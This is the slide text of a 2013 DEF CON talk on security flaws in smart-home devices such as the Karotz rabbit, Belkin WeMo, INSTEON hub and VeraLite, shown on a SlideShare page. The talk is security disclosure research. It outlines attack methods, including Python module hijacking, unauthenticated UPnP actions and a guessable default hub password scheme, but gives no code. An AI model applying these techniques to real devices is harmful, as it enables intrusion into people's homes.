SlideShare a Scribd company logo

Home Invasion 2.0 - DEF CON 21 - 2013

B
BaronZor

A talk discussing vulnerabilities in various "smart home" technologies from home automation gear to a child's toy.

TechnologyEntertainment & Humor
1 of 33
Download to read offline
© 2012 Home  Invasion  v2.0  
© 2012 WHO  ARE  WE?  
© 2012 Daniel  “unicornFurnace”  Crowley   •  Managing  Consultant,  Trustwave  SpiderLabs     Jennifer  “savagejen”  Savage   •  SoAware  Engineer,  Tabbedout     David  “videoman”  Bryan   •  Security  Consultant,  Trustwave  SpiderLabs     The  Presenters  
© 2012 WHAT  ARE  WE  DOING  HERE?  
© 2012 Science  ficFon  becomes  science  fact     Race  to  release  novel  products  means  poor  security     AIempt  to  hack  a  sampling  of  “smart”  devices     Many  products  we  didn’t  cover    Android  powered  oven    Smart  TVs  (another  talk  is  covering  one!)    IP  security  cameras   The  “Smart”  Home  
WHAT’S  OUT  THERE   NOW?     Locks,  thermostats,  fridges,   toilets,  lights,  toys   EnFre  smart  ciFes  like   Songdo       WHAT’S  IN  THE    FUTURE?    
    Karotz  Smart  Rabbit  
•  Exposure  of  wifi  network  credenFals  unencrypted   •  Unencrypted  remote  API  calls   •  Unencrypted  setup  package                download   •  Python  module  hijack  in                autorunwifi  script Karotz  Smart  Rabbit  
Karotz  Smart  Rabbit  
Karotz  Smart  Rabbit  
Karotz  Smart  Rabbit   Python  Module  Hijacking    •  Python  Module  Hijacking  is  insecure  library  loading   o  Similar  to  LD_PRELOAD  and  DLL  hijacking   •  Python  loads  modules  from  the  dir  of  script  first   •  Karotz  autorunwifi  script  uses  simplejson  module   o  Put  code  to  execute  in  simplejson.py  in  the  same   directory  as  autorunwifi   •  Defeats  code  signing    
Karotz  Smart  Rabbit    An  aIacker  could:     •  MITM  insecure  connecFon  to  Karotz  server   •  Replace  user's  download  with  malicious  version   •  Use  vuln  to  make  Karotz  run  their  own  code!   •  ...Bunny  bot  net?    
© 2012 Belkin  WeMo  Switch  
© 2012 •  Vulnerable  libupnp  version   o  Remote  pre-­‐auth  root   •  UnauthenFcated  UPnP  acFons   o  SetBinaryState   o  SetFriendlyName   •  EULA  used  to  “secure”  the  device.   •  Belkin  has  been  awesome!   Belkin  WeMo  Switch  
    SONOS  Bridge  
•  Support  console  informaFon  disclosure       SONOS  Bridge  
    SONOS  Bridge  
    SONOS  Bridge  
    SONOS  Bridge  
    SONOS  Bridge  
    SONOS  Bridge  
© 2012 LIXIL  SaSs  Smart  Toilet  
© 2012 •  Default  Bluetooth  PIN   LIXIL  SaSs  Smart  Toilet  
© 2012     INSTEON  Hub  
© 2012 INSTEON  Hub  
© 2012 •  Lack  of  authenFcaFon  on  web  console   o  Web  console  exposed  to  the  Internet   §  Time  zone  –  city   §  Name  street     o  Control  all  the  things.     •  Fixed  the  authenFcaFon  with  model  2422-­‐222”R”   INSTEON  Hub  
© 2012 •  SFll  lack  of  SSL/TLS   •  Uses  HTTP  Auth   o  Base64  encoded  credenFals   o  Username:  admin   o  Password:  ABCDEF    ←  INSTEON  ID  and  last  3  of   the  MAC   o  #SecurityFail   o  It  only  takes  16  Million  aIempts     INSTEON  Hub  
© 2012 MiCasaVerde  VeraLite  
© 2012 •  Lack  of  authenFcaFon  on  web  console  by  default   •  Insufficient  AuthorizaFon  Checks   o  Firmware  Update   o  Sekngs  backup   o  Test  Lua  code   •  Path  Traversal   •  Cross-­‐Site  Request  Forgery   •  Lack  of  authenFcaFon  on  UPnP  daemon   •  Vulnerable  libupnp  Version   •  Server  Side  Request  Forgery     •  Unconfirmed  AuthenFcaFon  Bypass   MiCasaVerde  VeraLite  
© 2012 •  Three  methods  of  auth  bypass   •  Seven  methods  to  get  root   •  Two  aIacks  remotely  exploitable  through  SE   •  PotenFal  for  ownage  of  ALL  the  VeraLites!   MiCasaVerde  VeraLite  
© 2012 DEMONSTRATION  
© 2012 CONCLUSION  
© 2012 Daniel  “unicornFurnace”  Crowley    dcrowley@trustwave.com    @dan_crowley   Jennifer  “savagejen”  Savage    savagejen@gmail.com  (PGP  key  ID  6326A948)    @savagejen   David  “videoman”  Bryan    dbryan@trustwave.com    @_videoman_       QuesSons?  

Recommended

FIWARE Global Summit - Connecting to IoT
FIWARE Global Summit - Connecting to IoTFIWARE Global Summit - Connecting to IoT
FIWARE Global Summit - Connecting to IoTFIWARE
 
FIWARE Global Summit - Building Your Own IoT Agent
FIWARE Global Summit - Building Your Own IoT AgentFIWARE Global Summit - Building Your Own IoT Agent
FIWARE Global Summit - Building Your Own IoT AgentFIWARE
 
Introduction to Game Network Programming
Introduction to Game Network ProgrammingIntroduction to Game Network Programming
Introduction to Game Network ProgrammingCorey Clark, Ph.D.
 
Introduction to Oberon HomeKit SDKs
Introduction to Oberon HomeKit SDKsIntroduction to Oberon HomeKit SDKs
Introduction to Oberon HomeKit SDKsCuno Pfister
 
Alfred Project @LinuxDayNapoli2014
Alfred Project @LinuxDayNapoli2014Alfred Project @LinuxDayNapoli2014
Alfred Project @LinuxDayNapoli2014gbr1
 
y3dips hacking priv8 network
y3dips hacking priv8 networky3dips hacking priv8 network
y3dips hacking priv8 networkidsecconf
 
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus GatewayAsterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus GatewayAlessandro Polidori
 
CODE BLUE 2014 : [ドローンへの攻撃] マルウェア感染とネットワーク経由の攻撃 by ドンチョル・ホン DONGCHEOL HONG
CODE BLUE 2014 : [ドローンへの攻撃] マルウェア感染とネットワーク経由の攻撃 by ドンチョル・ホン DONGCHEOL HONGCODE BLUE 2014 : [ドローンへの攻撃] マルウェア感染とネットワーク経由の攻撃 by ドンチョル・ホン DONGCHEOL HONG
CODE BLUE 2014 : [ドローンへの攻撃] マルウェア感染とネットワーク経由の攻撃 by ドンチョル・ホン DONGCHEOL HONGCODE BLUE
 

Recommended

FIWARE Global Summit - Connecting to IoT
FIWARE Global Summit - Connecting to IoTFIWARE Global Summit - Connecting to IoT
FIWARE Global Summit - Connecting to IoTFIWARE
 
FIWARE Global Summit - Building Your Own IoT Agent
FIWARE Global Summit - Building Your Own IoT AgentFIWARE Global Summit - Building Your Own IoT Agent
FIWARE Global Summit - Building Your Own IoT AgentFIWARE
 
Introduction to Game Network Programming
Introduction to Game Network ProgrammingIntroduction to Game Network Programming
Introduction to Game Network ProgrammingCorey Clark, Ph.D.
 
Introduction to Oberon HomeKit SDKs
Introduction to Oberon HomeKit SDKsIntroduction to Oberon HomeKit SDKs
Introduction to Oberon HomeKit SDKsCuno Pfister
 
Alfred Project @LinuxDayNapoli2014
Alfred Project @LinuxDayNapoli2014Alfred Project @LinuxDayNapoli2014
Alfred Project @LinuxDayNapoli2014gbr1
 
y3dips hacking priv8 network
y3dips hacking priv8 networky3dips hacking priv8 network
y3dips hacking priv8 networkidsecconf
 
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus GatewayAsterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus GatewayAlessandro Polidori
 
CODE BLUE 2014 : [ドローンへの攻撃] マルウェア感染とネットワーク経由の攻撃 by ドンチョル・ホン DONGCHEOL HONG
CODE BLUE 2014 : [ドローンへの攻撃] マルウェア感染とネットワーク経由の攻撃 by ドンチョル・ホン DONGCHEOL HONGCODE BLUE 2014 : [ドローンへの攻撃] マルウェア感染とネットワーク経由の攻撃 by ドンチョル・ホン DONGCHEOL HONG
CODE BLUE 2014 : [ドローンへの攻撃] マルウェア感染とネットワーク経由の攻撃 by ドンチョル・ホン DONGCHEOL HONGCODE BLUE
 
Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvil
Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvilNuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvil
Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvilDavid Godoy San Andrés
 
Future of Web Apps - Giving Customer Support using WebRTC
Future of Web Apps - Giving Customer Support using WebRTCFuture of Web Apps - Giving Customer Support using WebRTC
Future of Web Apps - Giving Customer Support using WebRTCDan Jenkins
 
Getting the Best Out Of WebRTC - Astricon 2014
Getting the Best Out Of WebRTC - Astricon 2014Getting the Best Out Of WebRTC - Astricon 2014
Getting the Best Out Of WebRTC - Astricon 2014Dan Jenkins
 
WebRTC Reborn London Node User Group
WebRTC Reborn London Node User GroupWebRTC Reborn London Node User Group
WebRTC Reborn London Node User GroupDan Jenkins
 
WebRTC Reborn Over The Air
WebRTC Reborn Over The AirWebRTC Reborn Over The Air
WebRTC Reborn Over The AirDan Jenkins
 
Lacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework
 
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKA
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKACODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKA
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKACODE BLUE
 
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONG
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONGCODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONG
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONGCODE BLUE
 
My home iot for dev connect korea
My home iot for dev connect koreaMy home iot for dev connect korea
My home iot for dev connect koreaYoonseok Hur
 
Number one-issue-voip-today-fraud
Number one-issue-voip-today-fraudNumber one-issue-voip-today-fraud
Number one-issue-voip-today-fraudFlavio Eduardo de Andrade Goncalves
 
Windows 10 IoT Core for Raspberry Pi 2
Windows 10 IoT Core for Raspberry Pi 2Windows 10 IoT Core for Raspberry Pi 2
Windows 10 IoT Core for Raspberry Pi 2Stavros Kalapothas
 
presentation
presentationpresentation
presentationaaron bishop
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014Flavio Eduardo de Andrade Goncalves
 
Customize and control connected devices
Customize and control connected devicesCustomize and control connected devices
Customize and control connected devicesCodemotion
 
Asterisk Deployments
Asterisk DeploymentsAsterisk Deployments
Asterisk DeploymentsAsterisk Community
 
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus GatewayAsterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus GatewayAlessandro Polidori
 
2012 ah emea deploying byod
2012 ah emea deploying byod2012 ah emea deploying byod
2012 ah emea deploying byodAruba, a Hewlett Packard Enterprise company
 
Universalserialweb frontconf
Universalserialweb frontconfUniversalserialweb frontconf
Universalserialweb frontconfasciidisco
 
Sniffer https connection over Android
Sniffer https connection over AndroidSniffer https connection over Android
Sniffer https connection over AndroidEnPing Eric Hsieh
 
Grohe Bathroom Brochure - Taps4Less.com
Grohe Bathroom Brochure - Taps4Less.comGrohe Bathroom Brochure - Taps4Less.com
Grohe Bathroom Brochure - Taps4Less.comTaps4Less.com
 
あるじゃんコミュニティ | SORACOMサービス紹介
あるじゃんコミュニティ | SORACOMサービス紹介あるじゃんコミュニティ | SORACOMサービス紹介
あるじゃんコミュニティ | SORACOMサービス紹介SORACOM,INC
 
Smart toilet in france_euromed management
Smart toilet in france_euromed managementSmart toilet in france_euromed management
Smart toilet in france_euromed managementXiaoqing Dora
 

More Related Content

What's hot

Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvil
Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvilNuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvil
Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvilDavid Godoy San Andrés
 
Future of Web Apps - Giving Customer Support using WebRTC
Future of Web Apps - Giving Customer Support using WebRTCFuture of Web Apps - Giving Customer Support using WebRTC
Future of Web Apps - Giving Customer Support using WebRTCDan Jenkins
 
Getting the Best Out Of WebRTC - Astricon 2014
Getting the Best Out Of WebRTC - Astricon 2014Getting the Best Out Of WebRTC - Astricon 2014
Getting the Best Out Of WebRTC - Astricon 2014Dan Jenkins
 
WebRTC Reborn London Node User Group
WebRTC Reborn London Node User GroupWebRTC Reborn London Node User Group
WebRTC Reborn London Node User GroupDan Jenkins
 
WebRTC Reborn Over The Air
WebRTC Reborn Over The AirWebRTC Reborn Over The Air
WebRTC Reborn Over The AirDan Jenkins
 
Lacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework
 
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKA
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKACODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKA
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKACODE BLUE
 
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONG
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONGCODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONG
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONGCODE BLUE
 
My home iot for dev connect korea
My home iot for dev connect koreaMy home iot for dev connect korea
My home iot for dev connect koreaYoonseok Hur
 
Windows 10 IoT Core for Raspberry Pi 2
Windows 10 IoT Core for Raspberry Pi 2Windows 10 IoT Core for Raspberry Pi 2
Windows 10 IoT Core for Raspberry Pi 2Stavros Kalapothas
 
Customize and control connected devices
Customize and control connected devicesCustomize and control connected devices
Customize and control connected devicesCodemotion
 
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus GatewayAsterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus GatewayAlessandro Polidori
 
Universalserialweb frontconf
Universalserialweb frontconfUniversalserialweb frontconf
Universalserialweb frontconfasciidisco
 
Sniffer https connection over Android
Sniffer https connection over AndroidSniffer https connection over Android
Sniffer https connection over AndroidEnPing Eric Hsieh
 

What's hot (19)

Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvil
Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvilNuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvil
Nuevo Dh032 de LILIN realice tareas de mantenimiento desde su móvil
 
Future of Web Apps - Giving Customer Support using WebRTC
Future of Web Apps - Giving Customer Support using WebRTCFuture of Web Apps - Giving Customer Support using WebRTC
Future of Web Apps - Giving Customer Support using WebRTC
 
Getting the Best Out Of WebRTC - Astricon 2014
Getting the Best Out Of WebRTC - Astricon 2014Getting the Best Out Of WebRTC - Astricon 2014
Getting the Best Out Of WebRTC - Astricon 2014
 
WebRTC Reborn London Node User Group
WebRTC Reborn London Node User GroupWebRTC Reborn London Node User Group
WebRTC Reborn London Node User Group
 
WebRTC Reborn Over The Air
WebRTC Reborn Over The AirWebRTC Reborn Over The Air
WebRTC Reborn Over The Air
 
Lacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security ThreatsLacework | Top 10 Cloud Security Threats
Lacework | Top 10 Cloud Security Threats
 
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKA
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKACODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKA
CODE BLUE 2014 : マルウエアによる検出回避方法の解説 by 篠塚 大志 HIROSHI SHINOTSUKA
 
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONG
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONGCODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONG
CODE BLUE 2014 : Drone attack by malware and network hacking by DONGCHEOL HONG
 
My home iot for dev connect korea
My home iot for dev connect koreaMy home iot for dev connect korea
My home iot for dev connect korea
 
Number one-issue-voip-today-fraud
Number one-issue-voip-today-fraudNumber one-issue-voip-today-fraud
Number one-issue-voip-today-fraud
 
Windows 10 IoT Core for Raspberry Pi 2
Windows 10 IoT Core for Raspberry Pi 2Windows 10 IoT Core for Raspberry Pi 2
Windows 10 IoT Core for Raspberry Pi 2
 
presentation
presentationpresentation
presentation
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014
 
Customize and control connected devices
Customize and control connected devicesCustomize and control connected devices
Customize and control connected devices
 
Asterisk Deployments
Asterisk DeploymentsAsterisk Deployments
Asterisk Deployments
 
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus GatewayAsterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: realize client SIP Phone with sipML5 and Janus Gateway
 
2012 ah emea deploying byod
2012 ah emea deploying byod2012 ah emea deploying byod
2012 ah emea deploying byod
 
Universalserialweb frontconf
Universalserialweb frontconfUniversalserialweb frontconf
Universalserialweb frontconf
 
Sniffer https connection over Android
Sniffer https connection over AndroidSniffer https connection over Android
Sniffer https connection over Android
 

Viewers also liked

Grohe Bathroom Brochure - Taps4Less.com
Grohe Bathroom Brochure - Taps4Less.comGrohe Bathroom Brochure - Taps4Less.com
Grohe Bathroom Brochure - Taps4Less.comTaps4Less.com
 
あるじゃんコミュニティ | SORACOMサービス紹介
あるじゃんコミュニティ | SORACOMサービス紹介あるじゃんコミュニティ | SORACOMサービス紹介
あるじゃんコミュニティ | SORACOMサービス紹介SORACOM,INC
 
Smart toilet in france_euromed management
Smart toilet in france_euromed managementSmart toilet in france_euromed management
Smart toilet in france_euromed managementXiaoqing Dora
 
LIXIL ACCEKERATOR 事前セミナー | IoTプラットフォーム SORACOM
LIXIL ACCEKERATOR 事前セミナー | IoTプラットフォーム SORACOMLIXIL ACCEKERATOR 事前セミナー | IoTプラットフォーム SORACOM
LIXIL ACCEKERATOR 事前セミナー | IoTプラットフォーム SORACOMSORACOM,INC
 

Viewers also liked (6)

Grohe Bathroom Brochure - Taps4Less.com
Grohe Bathroom Brochure - Taps4Less.comGrohe Bathroom Brochure - Taps4Less.com
Grohe Bathroom Brochure - Taps4Less.com
 
あるじゃんコミュニティ | SORACOMサービス紹介
あるじゃんコミュニティ | SORACOMサービス紹介あるじゃんコミュニティ | SORACOMサービス紹介
あるじゃんコミュニティ | SORACOMサービス紹介
 
Smart toilet in france_euromed management
Smart toilet in france_euromed managementSmart toilet in france_euromed management
Smart toilet in france_euromed management
 
Certificate-3
Certificate-3Certificate-3
Certificate-3
 
Grohe blue book bath
Grohe blue book bathGrohe blue book bath
Grohe blue book bath
 
LIXIL ACCEKERATOR 事前セミナー | IoTプラットフォーム SORACOM
LIXIL ACCEKERATOR 事前セミナー | IoTプラットフォーム SORACOMLIXIL ACCEKERATOR 事前セミナー | IoTプラットフォーム SORACOM
LIXIL ACCEKERATOR 事前セミナー | IoTプラットフォーム SORACOM
 

Similar to Home Invasion 2.0 - DEF CON 21 - 2013

[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...CODE BLUE
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdfRavi Aggarwal
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...Felipe Prado
 
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...JosephTesta9
 
Connecting RubyMotion with Hardware - Rubymotion #Inspect 2014
Connecting RubyMotion with Hardware - Rubymotion #Inspect 2014Connecting RubyMotion with Hardware - Rubymotion #Inspect 2014
Connecting RubyMotion with Hardware - Rubymotion #Inspect 2014Mark Villacampa
 
CableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home NetworkCableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home NetworkChristopher Grayson
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxlior mazor
 
LyonJUG - Combo - Quick Cloud Foundry Intro + Cloud Best Practices
LyonJUG - Combo - Quick Cloud Foundry Intro + Cloud Best PracticesLyonJUG - Combo - Quick Cloud Foundry Intro + Cloud Best Practices
LyonJUG - Combo - Quick Cloud Foundry Intro + Cloud Best PracticesEric Bottard
 
CIS 2015- IoT? The ‘I’ needs to be ‘Identity’- Paul Madsen
CIS 2015- IoT? The ‘I’ needs to be ‘Identity’- Paul MadsenCIS 2015- IoT? The ‘I’ needs to be ‘Identity’- Paul Madsen
CIS 2015- IoT? The ‘I’ needs to be ‘Identity’- Paul MadsenCloudIDSummit
 
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERSCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERCODE BLUE
 
idsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkidsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkAmmar WK
 
SCADA Software or Swiss Cheese Software - CODE BLUE, Japan
SCADA Software or Swiss Cheese Software - CODE BLUE, JapanSCADA Software or Swiss Cheese Software - CODE BLUE, Japan
SCADA Software or Swiss Cheese Software - CODE BLUE, JapanSignalSEC Ltd.
 
Creating secure apps using the salesforce mobile sdk
Creating secure apps using the salesforce mobile sdkCreating secure apps using the salesforce mobile sdk
Creating secure apps using the salesforce mobile sdkMartin Vigo
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)securityiphonepentest
 
Hacking your Android (slides)
Hacking your Android (slides)Hacking your Android (slides)
Hacking your Android (slides)Justin Hoang
 
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
 

Similar to Home Invasion 2.0 - DEF CON 21 - 2013 (20)

Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014
 
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdf
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...
 
Connecting RubyMotion with Hardware - Rubymotion #Inspect 2014
Connecting RubyMotion with Hardware - Rubymotion #Inspect 2014Connecting RubyMotion with Hardware - Rubymotion #Inspect 2014
Connecting RubyMotion with Hardware - Rubymotion #Inspect 2014
 
CableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home NetworkCableTap - Wirelessly Tapping Your Home Network
CableTap - Wirelessly Tapping Your Home Network
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
 
LyonJUG - Combo - Quick Cloud Foundry Intro + Cloud Best Practices
LyonJUG - Combo - Quick Cloud Foundry Intro + Cloud Best PracticesLyonJUG - Combo - Quick Cloud Foundry Intro + Cloud Best Practices
LyonJUG - Combo - Quick Cloud Foundry Intro + Cloud Best Practices
 
CIS 2015- IoT? The ‘I’ needs to be ‘Identity’- Paul Madsen
CIS 2015- IoT? The ‘I’ needs to be ‘Identity’- Paul MadsenCIS 2015- IoT? The ‘I’ needs to be ‘Identity’- Paul Madsen
CIS 2015- IoT? The ‘I’ needs to be ‘Identity’- Paul Madsen
 
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERSCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
 
idsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkidsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 network
 
SCADA Software or Swiss Cheese Software - CODE BLUE, Japan
SCADA Software or Swiss Cheese Software - CODE BLUE, JapanSCADA Software or Swiss Cheese Software - CODE BLUE, Japan
SCADA Software or Swiss Cheese Software - CODE BLUE, Japan
 
Creating secure apps using the salesforce mobile sdk
Creating secure apps using the salesforce mobile sdkCreating secure apps using the salesforce mobile sdk
Creating secure apps using the salesforce mobile sdk
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)security
 
Hacking your Android (slides)
Hacking your Android (slides)Hacking your Android (slides)
Hacking your Android (slides)
 
2012 ah vegas wlan security fundamentals
2012 ah vegas wlan security fundamentals2012 ah vegas wlan security fundamentals
2012 ah vegas wlan security fundamentals
 
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
 
Xamarin v.Now
Xamarin v.NowXamarin v.Now
Xamarin v.Now
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 Devices
 

More from BaronZor

The Patsy Proxy
The Patsy ProxyThe Patsy Proxy
The Patsy ProxyBaronZor
 
No-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksNo-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksBaronZor
 
Why UPnP is awesome and terrifying
Why UPnP is awesome and terrifyingWhy UPnP is awesome and terrifying
Why UPnP is awesome and terrifyingBaronZor
 
Advanced SQL Injection with SQLol
Advanced SQL Injection with SQLolAdvanced SQL Injection with SQLol
Advanced SQL Injection with SQLolBaronZor
 
Jack of all Formats
Jack of all FormatsJack of all Formats
Jack of all FormatsBaronZor
 
Daniel Crowley - Speaking with Cryptographic Oracles
Daniel Crowley - Speaking with Cryptographic OraclesDaniel Crowley - Speaking with Cryptographic Oracles
Daniel Crowley - Speaking with Cryptographic OraclesBaronZor
 
Windows File Pseudonyms
Windows File PseudonymsWindows File Pseudonyms
Windows File PseudonymsBaronZor
 

More from BaronZor (7)

The Patsy Proxy
The Patsy ProxyThe Patsy Proxy
The Patsy Proxy
 
No-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksNo-Knowledge Crypto Attacks
No-Knowledge Crypto Attacks
 
Why UPnP is awesome and terrifying
Why UPnP is awesome and terrifyingWhy UPnP is awesome and terrifying
Why UPnP is awesome and terrifying
 
Advanced SQL Injection with SQLol
Advanced SQL Injection with SQLolAdvanced SQL Injection with SQLol
